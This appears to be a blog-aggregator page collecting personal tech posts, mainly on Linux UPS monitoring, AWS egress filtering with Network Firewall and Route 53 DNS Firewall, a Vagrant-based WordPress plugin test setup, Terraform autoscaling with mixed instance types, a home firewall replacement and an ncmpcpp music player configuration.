[Charts omitted: for each of the following snaps, the page shows install base by OS, by channel, by version, and by country.]

azimuth, b2, bandwhich, bombsquad, classicube, defold, dog, dosbox-staging, dynahack, emoj, emu2, fab-agon-emulator, forgejo, halloy, hey-morty-wubba-lubba-dub-dub, iamb, ladder, lapin, libation, linuxtycoon, mame, matterbridge, mindustry, monolith, natron, ncspot, newsflash, notepadnext, null, openboardview, openspades, pencil, pwbm, rustscan, rota, session-desktop, sfxr, shattered-pixel-dungeon, spectrum-analyser, spek, spot, suckit, telegram-asahi, themirror, toot

Install base by Channel

Install base by Version ( toot )

Install base by Version

Install base by Country ( toot )

Install base by Country

twinejs

Install base by OS ( twinejs )

Install base by OS

Install base by Channel ( twinejs )

Install base by Channel

Install base by Version ( twinejs )

Install base by Version

Install base by Country ( twinejs )

Install base by Country

word-salad

Install base by OS ( word-salad )

Install base by OS

Install base by Channel ( word-salad )

Install base by Channel

Install base by Version ( word-salad )

Install base by Version

Install base by Country ( word-salad )

Install base by Country

x16emu

Install base by OS ( x16emu )

Install base by OS

Install base by Channel ( x16emu )

Install base by Channel

Install base by Version ( x16emu )

Install base by Version

Install base by Country ( x16emu )

Install base by Country

zzt

Install base by OS ( zzt )

Install base by OS

Install base by Channel ( zzt )

Install base by Channel

Install base by Version ( zzt )

Install base by Version

Install base by Country ( zzt )

Install base by Country

Chris WallaceMore Turtle shapes

I’ve come across some classic curves using arcs which can be described in my variant of Turtle...

Chris WallaceMy father in Tairua

My father in Tairua in 1929. Paku is in the background. My father, Francis Brabazon Wallace came...

Andy SmithI don’t think the cheapest APC Back-UPS units can be monitored except in Windows

TL;DR: Despite otherwise seeming to work correctly, I can’t monitor a Back-UPS BX1600MI in Linux without seeing a constant stream of spurious battery detach/reattach and power fail/restore events that last less than 2 seconds each. I’ve tried multiple computers and multiple UPSes of that model. It doesn’t happen in their own proprietary Windows software, so I think they’ve changed the protocol.

Apart from nearly two decades ago when I was given one for free, I’ve never bothered with a UPS at home. Our power grid is very reliable. Looking at availability information from “uptimed“, my home file server has been powered on for 99.97% of the time in the last 14 years. That includes time spent moving house and a day when the house power was off for several hours while the kitchen was refitted!

However, in December 2023 a fault with our electric oven popped the breaker for the sockets, causing everything to be harshly powered off. My fileserver took it badly and one drive died. That wasn’t a huge issue as it has a redundant filesystem, but I didn’t like it.

I decided I could afford to treat myself to a relatively cheap UPS.

I did some research and read some reviews of the APC Back-UPS range, their cheapest offering. Many people were dismissive, calling them cheap pieces of crap with flimsy plastic construction and batteries that aren’t regarded as user-replaceable. But there was no indication that such a model would not work, and I found it hard to justify paying a lot here.

I found YouTube videos of the procedure that a technician would go through to replace the battery in 3 to 5 years. To do it yourself voids your warranty, but your warranty is done after 3 years anyway. It looked pretty doable even for a hardware-avoidant person like myself.

It’s important to me that the UPS can be monitored by a Linux computer. The entire point here is that the computer detects when the battery is near to exhausted and gracefully powers itself down. There are two main options on Linux for this: apcupsd and Network UPS Tools (“nut“).
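
For reference, hooking a USB-connected UPS up to nut is normally just a few lines of /etc/nut/ups.conf, something like this (a sketch; the “backups” section name is my own invention):

[backups]
    driver = usbhid-ups
    port = auto
    desc = "APC Back-UPS"

After which upsc backups should list the UPS’s status variables.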

Looking at the Back-UPS BX1600MI model, it has a USB port for monitoring and says it can be monitored with APC’s own Powerchute Serial Shutdown Windows software. There’s an entry in nut‘s hardware compatibility list for “Back-UPS (USB)” of “supported, based on publicly available protocol”. I made the order.

The UPS worked as expected in terms of being an uninterruptible power supply. It was hopeless trying to talk to it with nut though. nut just kept saying it was losing communications.

I tried apcupsd instead. This stayed connected, but it showed a continuous stream of battery detach/reattach and power fail/restore events each lasting less than 2 seconds. Normally on a power fail you’d expect a visual and audible alert on the UPS itself and I wasn’t getting any of that, but I don’t know if that’s because they were real events that were just too brief.

I contacted APC support but they were very quick to tell me that they did not support any other software but their own Windows-only Powerchute Serial Shutdown (PCSS).

I then asked about this on the apcupsd mailing list. The first response:

“Something’s wrong with your UPS, most likely the battery is bad, but since you say the UPS is brand new, just get it replaced.”

As this thing was brand new I wasn’t going to go through a warranty claim with APC. I just contacted the vendor and told them I thought it was faulty and wanted to return it. They actually offered to send me a replacement in advance and have me send back the one I had, so I went for that.

In the meantime I found time to install Windows 10 in a virtual machine and pass USB through to it. Guess what? No spurious events in PCSS on Windows. It detected expected events when I yanked the power etc. I had no evidence that the UPS was in any way faulty. You can probably see what is coming.

The replacement UPS (of the same model) behaved exactly the same: spurious events. This just seems to be what the APC Back-UPS does on non-Windows.

Returning to my thread on the apcupsd mailing list, I asked again if there was actually anyone out there who had one of these working with non-Windows. The only substantive response I’ve got so far is:

“BX are the El Cheapo plastic craps, worst of all, not even the BExx0 family is such a crap – Schneider’s direct response to all the chinese craps flooding the markets […] no sane person would buy these things, but, well, here we are.”

So as far as I am aware, the Back-UPS models cannot currently be monitored from non-Windows. That will have to be my working theory unless someone who has one working on non-Windows contacts me to tell me I’m wrong, which I would be interested to hear about. I feel like I’ve done all that I can to find such people, by asking on the mailing list for the software that is meant for monitoring APC UPSes on Unix.

After talking all this over with the vendor they’ve recommended a Riello NPW 1.5kVA which is listed as fully supported by nut. They are taking the APC units back for a full refund; the Riello is about £30 more expensive.

Chris Wallace“Characters” a Scroll Saw Project

Now that the Delta Scroll saw is working, I was looking for a project to build up my skill. Large...

Chris WallaceDelta Scroll saw

I bought a scroll saw from the Hackspace where it was surplus equipment. There were two in an...

Jon SpriggsUsing #NetworkFirewall and #Route53 #DNS #Firewall to protect a private subnet’s egress traffic in #AWS

I wrote this post in January 2023, and it’s been languishing in my Drafts folder since then. I’ve had a look through it, and I can’t see any glaring reasons why I didn’t publish it so… it’s published… Enjoy 😀

If you’ve ever built a private subnet in AWS, you know it can be a bit tricky to get updates from the Internet – you end up having a NAT gateway or a self-managed proxy, and you can never be 100% certain that the egress traffic isn’t going somewhere you don’t want it to.

In this case, I wanted to ensure that outbound HTTPS traffic was being blocked if the SNI didn’t explicitly show the DNS name I wanted to permit through, and also, I only wanted specific DNS names to resolve. To do this, I used AWS Network Firewall and Route 53 DNS Firewall.

As I’ve written this blog post, I’ve also created a set of terraform files representing the steps I’ve taken, so you can follow along.

The Setup

Let’s start this story from a simple VPC with three private subnets for my compute resources, and three private subnets for the VPC Endpoints for Systems Manager (SSM).

Here’s our network diagram, with the three subnets containing the VPC Endpoints at the top, and the three instances at the bottom.

I’ve created a tag in my Github repo at this “pre-changes” state, called step 1.

At this point, none of those instances can reach anything outside the network, with the exception of the SSM environment. So, we can’t install any packages, we can’t get data from outside the network or anything similar.

Getting Protected Internet Access

In order to get internet access, we need to add five things:

  1. An internet gateway
  2. A NAT gateway in each AZ
  3. Which needs three new subnets
  4. And three Elastic IP addresses
  5. Route tables in all the subnets

To clarify, a NAT gateway acts like a DSL router. It hides the source IP address of outbound traffic behind a single, public IP address (using an Elastic IP from AWS), and routes any return traffic back to wherever that traffic came from. To reduce inter-AZ data transfer rates, I’m putting one in each AZ, but if there’s not a lot of outbound traffic or the outbound traffic isn’t critical enough to require resiliency, this could all be centralised to a single NAT gateway. To put a NAT gateway in each AZ, you need a subnet in each AZ, and to get out to the internet (by whatever means you have), you need an internet gateway and route tables for how to reach the NAT and internet gateways.

We should also probably add four additional things at this point.

  1. The Network Firewall
  2. Subnets for the Firewall interfaces
  3. Stateless Policy
  4. Stateful Policy

The Network Firewall acts like a single appliance, and uses a Gateway Load Balancer to present an interface into each of the availability zones. It has a stateless policy (which is very fast, but needs to address both inbound and outbound traffic flows) to do IP and Port based filtering (referred to as “Layer 3” filtering) and then specific traffic can be passed into a stateful policy (which is slower) to do packet and flow inspection.

In this case, I only want outbound HTTPS traffic to be passed, so my stateless rule group is quite simple;

  • VPC range on any port → Internet on TCP/443; pass to Stateful rule groups
  • Internet on TCP/443 → VPC range on any port; pass to Stateful rule groups

I have two stateful rule groups, one is defined to just allow access out to example.com and any relevant subdomains, using the “Domain List” stateful policy item. The other allows access to example.org and any relevant subdomains, using a Suricata stateful policy item, to show the more flexible alternative route. (Suricata has lots more filters than just the SNI value, you can check for specific SSH versions, Kerberos CNAMEs, SNMP versions, etc. You can also add per-rule logging this way, which you can’t with the Domain List route).
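
For a flavour of what the Domain List version looks like in terraform, it is roughly this (a sketch with illustrative names and capacity, not the exact code from my repo):

resource "aws_networkfirewall_rule_group" "allow_example_com" {
  capacity = 100
  name     = "allow-example-com"
  type     = "STATEFUL"

  rule_group {
    rules_source {
      rules_source_list {
        # Allow TLS flows whose SNI is example.com or any subdomain of it
        generated_rules_type = "ALLOWLIST"
        target_types         = ["TLS_SNI"]
        targets              = [".example.com", "example.com"]
      }
    }
  }
}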

These are added to the firewall policy, which also defines that if a rule doesn’t match a stateless rule group, or an established flow doesn’t match a stateful rule group, then it should be dropped.

New network diagram with more subnets and objects, but essentially, as described in the paragraphs above. Traffic flows from the instances either down towards the internet, or up towards the VPCe.

I’ve created a tag in my Github repo at this state, with the firewall, NAT Gateway and Internet Gateway, called step 2.

So far, so good… but why let our users even try to resolve the DNS name of a host they’re not permitted to reach. Let’s turn on DNS Firewalling too.

Turning on Route 53 DNS Firewall

You’ll notice that in the AWS Network Firewall, I didn’t let DNS out of the network. This is because, by default, AWS enables Route 53 as its local resolver. This lives on the “.2” address of the VPC, so in my example environment, this would be 198.18.0.2. Because it’s a local resolver, it won’t cross the Firewall on its way out to the internet. You can also make Route 53 use your own DNS servers for specific DNS resolution (for example, if you’re running an Active Directory service inside your network).

Any Network Security Response team members you have working with you would appreciate it if you’d turn on DNS Logging at this point, so I’ll do it too!

In March 2021, AWS announced “Route 53 DNS Firewall”, which allows this DNS resolver to rewrite responses, or even to completely deny the existence of a DNS record. With this in mind, I’m going to add some custom DNS rules.

The first thing I want to do is to permit traffic only to my specific list of DNS names – example.org, example.com and their subdomains. DNS quite likes to terminate DNS names with a dot, signifying it shouldn’t try to resolve any higher up the chain, so I’m going to make a “permitted domains” DNS list:

example.com.
example.org.
*.example.com.
*.example.org.

Nice and simple! Except, this also stops me from being able to access the instances over SSM, so I’ll create a separate “VPCe” DNS list:

ssm.ex-ample-1.amazonaws.com.
*.ssm.ex-ample-1.amazonaws.com.
ssmmessages.ex-ample-1.amazonaws.com.
*.ssmmessages.ex-ample-1.amazonaws.com.
ec2messages.ex-ample-1.amazonaws.com.
*.ec2messages.ex-ample-1.amazonaws.com.

Next I create a “default deny” DNS list:

*.

And then build a DNS Firewall Policy which allows access to the “permitted domains”, “VPCe” lists, but blocks resolution of any “default deny” entries.
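
In terraform, the lists and rules come out roughly like this (a sketch with illustrative names and priorities; the VPCe list follows the same pattern, and you still need to associate the rule group with the VPC):

resource "aws_route53_resolver_firewall_domain_list" "permitted" {
  name    = "permitted-domains"
  domains = ["example.com.", "example.org.", "*.example.com.", "*.example.org."]
}

resource "aws_route53_resolver_firewall_domain_list" "default_deny" {
  name    = "default-deny"
  domains = ["*."]
}

resource "aws_route53_resolver_firewall_rule_group" "egress_dns" {
  name = "egress-dns"
}

# Lower priority values are evaluated first, so the allow comes before the deny.
resource "aws_route53_resolver_firewall_rule" "allow" {
  name                    = "allow-permitted"
  action                  = "ALLOW"
  firewall_domain_list_id = aws_route53_resolver_firewall_domain_list.permitted.id
  firewall_rule_group_id  = aws_route53_resolver_firewall_rule_group.egress_dns.id
  priority                = 100
}

resource "aws_route53_resolver_firewall_rule" "deny" {
  name                    = "block-everything-else"
  action                  = "BLOCK"
  block_response          = "NXDOMAIN"
  firewall_domain_list_id = aws_route53_resolver_firewall_domain_list.default_deny.id
  firewall_rule_group_id  = aws_route53_resolver_firewall_rule_group.egress_dns.id
  priority                = 200
}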

I’ve created a tag in my Github repo at this state, with the Route 53 DNS Firewall configured, called step 3.

In conclusion…

So there we have it. While the network is not “secure” (there are still a few gaps here) it’s certainly MUCH more secure than it was, and it would take a lot more work for anyone with malicious intent to get your content out.

Feel free to have a poke around, and leave comments below if this has helped or is of interest!

Jon SpriggsTesting and Developing WordPress Plugins using Vagrant to provide the test environment

I keep trundling back to a collection of WordPress plugins that I really love. And sometimes I want to contribute patches to the plugin.

I don’t want to develop against this server (that would be crazy… huh… right… no one does that… *cough*) but instead, I want a nice, fresh and new WordPress instance to just check that it works the way I was expecting.

So, I created a little Vagrant environment, just for testing WordPress plugins. I clone the repository for the plugin, and create a “TestingEnvironment” directory in there.

I then create the following Vagrantfile.

Vagrant.configure("2") do |config|
  config.vm.box = "ubuntu/jammy64"
  # This will create an IP address in the range 192.168.64.0/24 (usually)
  config.vm.network "private_network", type: "dhcp"
  # This loads the git repo for the plugin into /tmp/git_repo
  config.vm.synced_folder "../", "/tmp/git_repo"

  # If you've got vagrant-cachier, this will speed up apt update/install operations
  if Vagrant.has_plugin?("vagrant-cachier")
    config.cache.scope = :box
  end

  config.vm.provision "shell", inline: <<-SHELL

    # Install Dependencies
    apt-get update
    apt-get install -y apache2 libapache2-mod-fcgid php-fpm mysql-server php-mysql git

    # Set up Apache
    a2enmod proxy_fcgi setenvif
    a2enconf "$(basename "$(ls /etc/apache2/conf-available/php*)" .conf)"
    systemctl restart apache2
    rm -f /var/www/html/index.html

    # Set up WordPress
    bash /vagrant/root_install_wordpress.sh
  SHELL
end

Next, let’s create that root_install_wordpress.sh file.

#! /bin/bash

# Allow us to run commands as www-data
chsh -s /bin/bash www-data
# Let www-data access files in the web-root.
chown -R www-data:www-data /var/www

# Install wp-cli system-wide
curl -s -S -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar
mv wp-cli.phar /usr/local/bin/wp
chmod +x /usr/local/bin/wp

# Slightly based on 
# https://www.a2hosting.co.uk/kb/developer-corner/mysql/managing-mysql-databases-and-users-from-the-command-line
echo "CREATE DATABASE wp;" | mysql -u root
echo "CREATE USER 'wp'@'localhost' IDENTIFIED BY 'wp';" | mysql -u root
echo "GRANT ALL PRIVILEGES ON wp.* TO 'wp'@'localhost';" | mysql -u root
echo "FLUSH PRIVILEGES;" | mysql -u root

# Execute the generic install script
su - www-data -c "bash /vagrant/user_install_wordpress.sh"
# Install any plugins with this script
su - www-data -c "bash /vagrant/customise_wordpress.sh"
# Log the path to access
echo "URL: http://$(sh /vagrant/get_ip.sh) User: admin Password: password"

Now we have our dependencies installed and our database created, let’s get WordPress installed with user_install_wordpress.sh.

#! /bin/bash

# Largely based on https://d9.hosting/blog/wp-cli-install-wordpress-from-the-command-line/
cd /var/www/html
# Install the latest WP into this directory
wp core download --locale=en_GB
# Configure the database with the credentials set up in root_install_wordpress.sh
wp config create --dbname=wp --dbuser=wp --dbpass=wp --locale=en_GB
# Skip the first-run-wizard
wp core install --url="http://$(sh /vagrant/get_ip.sh)" --title=Test --admin_user=admin --admin_password=password --admin_email=example@example.com --skip-email
# Setup basic permalinks
wp option update permalink_structure ""
# Flush the rewrite schema based on the permalink structure
wp rewrite structure ""

Excellent. This gives us a working WordPress environment. Now we need to add our customisation – the plugin we’re deploying. In this case, I’ve been tweaking the “presenter” plugin so here’s the customise_wordpress.sh code:

#! /bin/bash

cd /var/www/html/wp-content/plugins
git clone /tmp/git_repo presenter --recurse-submodules
wp plugin activate presenter

Actually, that /tmp/git_repo path is a call-back to this line in the Vagrantfile: config.vm.synced_folder "../", "/tmp/git_repo".

And there you have it; a vanilla WordPress install, with the plugin installed and ready to test. It only took 4 years to write up a blog post for it!

As an alternative, you could instead put the plugin you’re working with in a subdirectory of the Vagrantfile and supporting files, then you’d just need to change that git clone /tmp/git_repo line to git clone /vagrant/MyPlugin – but then you can’t offer this to the plugin repo as a PR, can you? 😀

Featured image is “Killer travel plug and socket board” by “Ashley Basil” on Flickr and is released under a CC-BY license.

Phil SpencerWho’s sick of this shit yet?

I find some headlines just make me angry these days, especially ones centered around hyper late stage capitalism.


This one about Apple and Microsoft just made me go “Who the fuck cares?”, and seriously, why should I? Those two idiot companies having insane and disgustingly huge market caps isn’t something I’m impressed by.

If anything it makes me furious.

Do something useful besides making iterations of the same ol’ junk. Make a few thousand houses, make an affordable grocery supply chain.

If you’re doing anything else you’re a waste of everyone’s time… as I type this on my Apple computer. Still, that bit of honesty aside, I don’t give a fuck about either company’s made-up valuation.

Andy SmithFarewell Soekris, old friend

This morning I shut off the Soekris Engineering net4801 that has served as our home firewall / PPP termination box for just over 18½ years.

Front view of a Soekris net4801
Front view of a Soekris net4801. Clothes peg for scale.
Inside of a Soekris net4801
Inside of a Soekris net4801.

In truth this has been long overdue. Like, at least 10 years overdue. It has been struggling to cope with even our paltry ~60Mbps VDSL (what the UK calls Fibre to the Cabinet). But I am very lazy, and change is work.

In theory we can get fibre from Openreach to approach 1Gbit/s down, and I should sort that out, but see above about me being really very lazy. The poor old Soekris would certainly not be viable then.

I’ve replaced it with a PC Engines APU2 (the apu2e2 model). Much like the Soekris it’s a fanless single board x86 computer with coreboot firmware so it’s manageable from the BIOS over serial.

Views of the PC Engines apu2e2 board and its case1d2redu enclosure: front, rear and opened (images copyright PC Engines GmbH).
            Soekris net4801             PC Engines apu2e2
CPU         AMD GX1                     AMD GX-412TC
            1 core @266MHz              4 cores @1GHz (turbo 1.4GHz)
            x86 (32-bit)                amd64 (64-bit)
Memory      128MiB                      2048MiB
Storage     512MiB CompactFlash         16GiB mSATA SSD
Ports       3x 100M Ethernet, 1 serial  3x 1G Ethernet, 1 serial

The Soekris ran Debian and so does the APU2. Installing it over PXE was completely straightforward on the APU2; a bit simpler than it was with the net4801 back in 2005! If you have just one and it’s right there in the same building then it’s probably quicker to just boot the Debian installer off of USB though. I may be lazy but once I do get going I’m also pointlessly bloody-minded.

Anyway, completely stock Debian works fine, though obviously it has no display whatsoever — all non-Ethernet-based interaction would have to be done over serial. By default that runs at 115200 baud (8n1).

This is not “home server” material. Like the Soekris even in 2005 it’s weak and it’s expensive for what it is. It’s meant to be an appliance. I think I was right with the Soekris’s endurance, beyond even sensible limits, and I hope I will be right about the APU2.

The Soekris is still using its original 512M CompactFlash card from 2005 by the way. Although admittedly I did go to some effort to make it run on a read-only filesystem, only flipped to read-write for upgrades.

Jon SpriggsUsing Terraform to select multiple Instance Types for an Autoscaling Group in AWS

Tale as old as time, the compute instance type you want to use in AWS is highly contested (or worse yet, not as available in every availability zone in your region)! You plead with your TAM or AM “Please let us have more of that instance type” only to be told “well, we can put in a request, but… haven’t you thought about using a range of instance types”?

And yes, I’ve been on both sides of that conversation, sadly.

The commented terraform

# This is your legacy instance_type variable. Ideally we'd have
# a warning we could raise at this point, telling you not to use
# this variable, but... it's not ready yet.
variable "instance_type" {
  description = "The legacy single-instance size, e.g. t3.nano. Please migrate to instance_types ASAP. If you specify instance_types, this value will be ignored."
  type        = string
  default     = null
}

# This is your new instance_types value. If you don't already have
# some sort of legacy use of the instance_type variable, then don't
# bother with that variable or the locals block below!
variable "instance_types" {
  description = "A list of instance sizes, e.g. [t2.nano, t3.nano] and so on."
  type        = list(string)
  default     = null
}

# Use only this locals block (and the value further down) if you
# have some legacy autoscaling groups which might use individual
# instance_type sizes.
locals {
  # If var.instance_types is set, use it as-is; otherwise wrap the
  # legacy var.instance_type value in a single-element list.
  instance_types = var.instance_types != null ? var.instance_types : [ var.instance_type ]
}

resource "aws_launch_template" "this" {
  # The prefix for the launch template name
  # default "my_autoscaling_group"
  name_prefix = var.name

  # The AMI to use. Calculated outside this process.
  image_id = data.aws_ami.this.id

  # This block ensures that any new instances are created
  # before deleting old ones.
  lifecycle {
    create_before_destroy = true
  }

  # This block defines the disk size of the root disk in GB
  block_device_mappings {
    device_name = data.aws_ami.this.root_device_name
    ebs {
      volume_size = var.disksize # default "10"
      volume_type = var.disktype # default "gp2"
    }
  }

  # Security Groups to assign to the instance. Alternatively
  # create a network_interfaces{} block with your
  # security_groups = [ var.security_group ] in it.
  vpc_security_group_ids = [ var.security_group ]

  # Any on-boot customizations to make.
  user_data = var.userdata
}

resource "aws_autoscaling_group" "this" {
  # The name of the Autoscaling Group in the Web UI
  # default "my_autoscaling_group"
  name = var.name

  # The list of subnets into which the ASG should be deployed.
  vpc_zone_identifier = var.private_subnets
  # The smallest and largest number of instances the ASG should scale between
  min_size            = var.min_rep
  max_size            = var.max_rep

  mixed_instances_policy {
    launch_template {
      # Use this template to launch all the instances
      launch_template_specification {
        launch_template_id = aws_launch_template.this.id
        version            = "$Latest"
      }

      # This loop can either use the calculated value "local.instance_types"
      # or, if you have no legacy use of this module, remove the locals{}
      # and the variable "instance_type" {} block above, and replace the
      # for_each and instance_type values (defined as "local.instance_types")
      # with "var.instance_types".
      #
      # Loop through the whole list of instance types and create a
      # set of "override" values (the values are defined in the content{}
      # block).
      dynamic "override" {
        for_each = local.instance_types
        content {
          instance_type = local.instance_types[override.key]
        }
      }
    }

    instances_distribution {
      # If we "enable spot", then make it 100% spot.
      on_demand_percentage_above_base_capacity = var.enable_spot ? 0 : 100
      spot_allocation_strategy                 = var.spot_allocation_strategy
      spot_max_price                           = "" # Empty string is "on-demand price"
    }
  }
}

So what is all this then?

This is two Terraform resources; an aws_launch_template and an aws_autoscaling_group. These two resources define what should be launched by the autoscaling group, and then the settings for the autoscaling group.

You will need to work out what instance types you want to use (e.g. “must have 16 cores and 32 GB RAM, have an x86_64 architecture and allow up to 15 Gigabit/second throughput”).
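
If you’d rather not trawl the instance type tables by hand, AWS publishes a CLI called amazon-ec2-instance-selector that can turn requirements like those into a candidate list; invoked along these lines (a sketch from memory, so check the tool’s own help for current flag syntax):

# Print instance types with 16 vCPUs, 32 GiB of RAM and an x86_64 CPU
ec2-instance-selector --vcpus 16 --memory 32 --cpu-architecture x86_64

The output is a plain list of instance type names you can drop straight into instance_types.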

When might you use this pattern?

If you have been seeing messages like “There is no Spot capacity available that matches your request.” or “We currently do not have sufficient <size> capacity in the Availability Zone you requested.” then you need to consider diversifying the fleet that you’re requesting for your autoscaling group. To do that, you need to specify more instance types. To achieve this, I’d use the above code to replace (something like) one of the code samples below.

If you previously have had something like this:

resource "aws_launch_configuration" "this" {
  iam_instance_profile        = var.instance_profile_name
  image_id                    = data.aws_ami.this.id
  instance_type               = var.instance_type
  name_prefix                 = var.name
  security_groups             = [ var.security_group ]
  user_data_base64            = var.userdata
  spot_price                  = var.spot_price

  root_block_device {
    volume_size = var.disksize
  }

  lifecycle {
    create_before_destroy = true
  }
}

resource "aws_autoscaling_group" "this" {
  capacity_rebalance   = false
  launch_configuration = aws_launch_configuration.this.id
  max_size             = var.max_rep
  min_size             = var.min_rep
  name                 = var.name
  vpc_zone_identifier  = var.private_subnets
}

Or this:

resource "aws_launch_template" "this" {
  lifecycle {
    create_before_destroy = true
  }

  block_device_mappings {
    device_name = data.aws_ami.this.root_device_name
    ebs {
      volume_size = var.disksize
    }
  }

  iam_instance_profile {
    name = var.instance_profile_name
  }

  network_interfaces {
    associate_public_ip_address = true
    security_groups             = local.node_security_groups
  }

  image_id      = data.aws_ami.this.id
  name_prefix   = var.name
  instance_type = var.instance_type
  user_data     = var.userdata

  instance_market_options {
    market_type = "spot"
    spot_options {
      spot_instance_type = "one-time"
    }
  }

  metadata_options {
    http_tokens                 = var.imds == 1 ? "optional" : "required"
    http_endpoint               = "enabled"
    http_put_response_hop_limit = 1
  }
}

resource "aws_autoscaling_group" "this" {
  name                = var.name
  vpc_zone_identifier = var.private_subnets
  min_size            = var.min_rep
  max_size            = var.max_rep

  launch_template {
    id      = aws_launch_template.this.id
    version = "$Latest"
  }
}

Then this new method is a much better idea :) Even more so if you had two launch templates to support spot and non-spot instance types!

Hat-tip to former colleague Paul Moran who opened my eyes to defining your fleet of variable instance types, as well as to my former customer (deliberately unnamed) and my current employer who both stumbled into the same documentation issue. Without Paul’s advice with my prior customer’s issue I’d never have known what I was looking for this time around!

Featured image is “Fishing fleet” by “Nomad Tales” on Flickr and is released under a CC-BY-SA license.

Phil SpencerNew year new…..This

I have made a New Year’s goal to retire this server before March; the OS has been upgraded many, many times over the years and various software I’ve used has come and gone, so there is lots of cruft. This server/VM started in San Francisco, and then my provider stopped offering VMs in CA and moved my VM to the UK, which is where it has been ever since. This VM started its life in Jan 2008 and it is time to die.

During my 2 week xmas break I have been updating web-facing software as much as I could, so that when I do put the bullet in the head of this thing I can transfer my blog, wiki, and a couple of other still-active sites to the new OS with minimal tweaking in their new home.

So far the biggest issues I ran into were with my mediawiki. That entire site is very old - from around 2006, two years before I started hosting it for someone, and then I inherited it entirely around 2009 - so the database is very finicky to upgrade and some of the extensions are no longer maintained. What I ended up doing was setting up a docker instance at home to test upgrading and work through the kinks, and I have put together a solid step-by-step on how to move/upgrade it to latest.

I have also gotten sick of running my own e-mail servers - the spam management, certificates, block lists… it’s annoying. I found out recently that iCloud, which I already have a subscription to, allows up to 5 custom e-mail domains, so I retired my Philtopia e-mail to it early in December and as of today I moved the vo-wiki domain to it as well. Much less hassle for me; I already do enough work at work, I don’t need to work at home as well.

The other work continues, site by site, but I think I am on track to put an end to this ol’ server early in the year.

Phil Spencer8bit party

It’s been a few years… four? since my Commodore 64 collection started, and I’ve now got two working C64s and a functioning C128, along with two disk drives, a tape drive and a collection of add-on hardware and boxed games.

That isn’t all I am collecting, however: I also have my Nintendo Entertainment System, and even more recently I acquired a Sega Master System. The 8-bit era really seems to catch my eye far more than anything that came after. I suppose it’s because the whole era made it on hacks and luck.

In any case, here are some pictures of my collection. I don’t collect for the sake of collecting; everything I have I use or play, ’cause otherwise why bother having it?

Enjoy

My desk
NES
Sega Master System
Commodore 64
Games

Phil SpencerI think it’s time the blog came back

It’s been a while since I’ve written a blog post, almost 4 years in fact, but I think it is time for a comeback.

The reason for this is that social media has become so locked down you can’t actually give a valid opinion about something without someone flagging your comment or it being caught by a robot. Oddly enough, it seems the right-wing folks can say whatever they want against the immigrant villain of the month or LGBTQIA+ issues without being flagged, but if you dare stand up to them or offer an opposing opinion: 30 day ban!

So it is time to dust off the ol’ blog and put my opinions to paper somewhere else, just like the olden days before social media! It isn’t all bad of course; I’ve found mastodon quite open to opinions, but the fediverse is getting a lot of corporate attention these days and I’m sure it’s only a year or two before even that ends up a complete mess.

Crack open the blogs and let those opinions fly

Andy Smithncmpcpp — A Modern(ish) Text-Based Music Setup On Linux

Preface

This article is about how I’ve ended up (back) on the terminal-based music player ncmpcpp on my GNOME Linux desktop and laptop. I’ll cover why it is that this has happened, and some of the finer points of the configuration. The various scripts are available at GitHub. My thing now looks like this:

A screenshot of my ncmpcpp setup running in a kitty terminal, with a track change notification visible in the top right corner
A screenshot of my ncmpcpp setup running in a kitty terminal, with a track change notification visible in the top right corner

These sorts of things are inherently personal. I don’t expect that most people would have my requirements — the lack of functioning software that caters for them must indicate that — but if you do, or if you’re just interested in seeing what a modern text interface player can do on Linux, maybe you will be interested in what I came up with.

My Requirements

I’m one of those strange old-fashioned people who likes owning the music I regularly play, instead of just streaming everything, always. I don’t mind doing a stream search to play something on a whim or to check out new music, but if I think I’ll want to listen to it again then I want to own a copy of it. So I also need something to play music with.

I thought I had simple requirements.

Essential

  • Fill a play queue randomly by album, i.e. queue entire albums at once until some target number of tracks are in the queue. The sort of thing that’s often called a “dynamic playlist” or a “smart playlist” these days.
  • Have working media keys, i.e. when I press the Play/Pause button or the Next button on my keyboard, that actually happens.

That’s it. Those are my essential requirements.

Nice to have

  • Have album cover art displayed.
  • Have desktop notifications show up announcing a new track being played.

Ancient history

Literally decades ago these needs were met by the likes of Winamp and Amarok; software that’s now consigned to history. Still more than a decade ago on desktop Linux I looked around and couldn’t easily find what I wanted from any of the music apps. I settled on putting my music in mpd and using an mpd client to play it, because that way it was fairly easy to write a script for a dynamic play queue that worked exactly how I wanted it to — the most important requirement.

For a while I used a terminal-based mpd client called ncmpcpp. I’m very comfortable in a Linux terminal so this wasn’t alien to me. It’s very pleasant to use, but being text-based it doesn’t come with the niceties of media key support, album cover art or desktop notifications. The mpd client that I settled upon was GNOME’s built-in gmpc. It’s a very basic player but all it had to do was show the play queue that mpd had provided, and do the media keys, album art and notifications.

Change Is Forced Upon Me

Fast forward to December 2023 and I found myself desperately needing to upgrade my Ubuntu 18.04 desktop machine. I switched to Debian 12, which brought with it a new major version of GNOME as well as using Wayland instead of Xorg. And I found that gmpc didn’t work correctly any more! The media keys weren’t doing anything (they work fine in everything else), and I didn’t like the notifications.

I checked out a wide range of media players again. I’m talking Rhythmbox, Clementine, Strawberry, Quod Libet and more. Some of them clearly didn’t do the play queue thing. Others might do, but were incomprehensible to me and lacking in documentation. I think the nearest might have been Rhythmbox, which has a plugin that can queue a specified number of random albums. There is an 11 year old GitHub issue asking for it to just continually queue such albums. A bit clunky without that.

I expect some reading this are now shouting at their screens about how their favourite player does actually do what I want. It’s quite possible I was too ignorant to notice it or work out how. Did I mention that quite a lot of this software is not documented at all? Seriously, major pieces of software that just have a web site that is a set of screenshots and a bulleted feature list and …that’s it. I had complained about this on Fedi and got some suggestions for things to try, which I will (and I’ll check out any that are suggested here), but the thing is… I know how shell scripts work now. 😀

This Is The Way

I had a look at ncmpcpp again. I still enjoyed using it. I was able to see how I could get the niceties after all. This is how.

Required Software

Here’s the software I needed to install to make this work on Debian 12. I’m not going to particularly go into the configuration of Debian, GNOME, mpd or ncmpcpp because it doesn’t really matter how you set those up. Just first get to the point where your music is in mpd and you can start ncmpcpp to play it.

Packaged in Debian

  • mpd
  • mpc
  • ncmpcpp
  • kitty
  • timg
  • libnotify-bin
  • inotify-tools

So:

$ apt install mpd mpc ncmpcpp kitty timg libnotify-bin inotify-tools

In case you weren’t aware, you can arrange for your personal mpd to be started every time you start your desktop environment like this:

$ systemctl --user enable --now mpd

The --now flag both enables the service and starts it right away.

At this point you should have mpd running and serving your music collection to any mpd client that connects. You can verify this with gmpc which is a very simple graphical mpd client.

Not currently packaged in Debian

mpd-mpris

